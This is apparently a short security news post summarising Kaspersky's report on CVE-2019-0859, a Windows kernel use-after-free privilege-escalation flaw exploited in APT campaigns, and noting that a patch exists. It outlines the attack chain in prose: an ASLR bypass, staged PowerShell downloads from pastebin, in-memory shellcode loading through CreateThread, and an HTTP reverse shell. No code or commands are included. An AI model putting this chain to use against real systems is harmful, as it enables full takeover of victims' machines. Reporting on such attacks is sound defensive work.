Windows Zero-Day Exploit
Windows has recently released a patch for a vulnerability exploit in the windows operating system which was unknown to many people until last week. The vulnerability would allow a hacker to open a door for full system control.
Discovered by Vasily Berdnikov and Boris Larin of Kaspersky Lab on St. Patrick’s Day this year, the flaw (CVE-2019-0859) is a use-after-free issue in the Windows kernel that allows local privilege escalation (LPE). It’s being used in advanced persistent threat (APT) campaigns targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10).
win32k!xxxFreeWindow+0x1344 on up-to-date Windows 7 SP1 x64
The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.
After a successful exploitation, the exploit executed PowerShell with a Base64 encoded command. The main aim of this command was to download a second-stage script from https//pastebin.com. The second stage PowerShell executes the final third stage, which is also a PowerShell script.
Third stage PowerShell script
The third script is very simple and does the following:
- Unpacks shellcode
- Allocates executable memory
- Copies shellcode to allocated memory
- Calls CreateThread to execute shellcode
Shellcode from PowerShell script
The main goal of the shellcode is to make a trivial HTTP reverse shell. This helps the attacker gain full control over the victim’s system.
Thankfully there is an update for this vulnerability at the Microsoft website
Details provided from SecureList
- Tackling Shadow IT: The Unseen Network Security Risk
- How to Spot and Report Cybercrime Effectively
- IT Management Strategies For Startups
- 3 Common Mistakes in IT Operations You Can’t Afford to Make
- How Generative AI Impacts Email Security
Loading ...